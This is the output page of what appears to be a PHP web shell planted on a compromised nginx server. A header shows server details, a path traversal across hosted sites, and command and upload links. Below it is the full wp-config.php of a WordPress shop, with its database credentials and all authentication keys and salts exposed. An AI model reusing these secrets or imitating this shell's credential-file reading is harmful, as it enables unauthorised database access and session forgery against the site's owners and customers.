|
Server IP : 62.171.151.215 / Your IP : 216.73.217.19 Web Server : nginx/1.18.0 System : Linux vmi3128365 5.15.0-176-generic #186-Ubuntu SMP Fri Mar 13 11:01:42 UTC 2026 x86_64 User : alex ( 1000) PHP Version : 8.4.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /var/www/workoutfacile.com/../boutique-masculine.ledenicheurgagnant.com/wp-content/../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'boutiquemz' );
/** Database username */
define( 'DB_USER', 'boutiquemz' );
/** Database password */
define( 'DB_PASSWORD', 'tMAboROml1pxRz1X8CvOxvZyBSjUTmMH24KDGY9xgiYa' );
/** Database hostname */
define( 'DB_HOST', '127.0.0.1' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'f7ed2e5b1bb030cfb255ed57ded6e191958c0134c1fce10f9aa2d5c46acc8c138c44b8984260e2cb' );
define( 'SECURE_AUTH_KEY', '3b27569b7fbffda8762bb97134d348bed15ffb29064dd18383c18f1534d0c937c1b3098bfdab6032' );
define( 'LOGGED_IN_KEY', '2386196cd98454fd0c1650278cbd0ff3635c26ae264353b7d1d260810ded9a8685abdb7dab3fae3c' );
define( 'NONCE_KEY', 'c738d47af050a3a13d7dbbe5c3857a9f4b5ba726745aeff080f4f76db04c3fb6c5ae7bf893cbf6c1' );
define( 'AUTH_SALT', '5da05dd03bb70a3bbab2124e61e30558adfc0762c942e59b4aa372f93b4a9d12e11c4f7438caa6e0' );
define( 'SECURE_AUTH_SALT', '3d4c99135d75c7204eaba46ce5e179bda7cf7f83bf1c489dc87ffcacc48e9de6508419e92177e43a' );
define( 'LOGGED_IN_SALT', '14152130ea8584fb4502ea5649399107eceade297a77aad642f4d7a9f45cbb70ef02437e1858e5f8' );
define( 'NONCE_SALT', '37f4ced4a071496bb35ebc95daa56f08c2546c2676f458bead7f45095a560120f084f17f307fbd34' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*
* At the installation time, database tables are created with the specified prefix.
* Changing this value after WordPress is installed will make your site think
* it has not been installed.
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
/** Forge-like defaults */
define("FS_METHOD", "direct");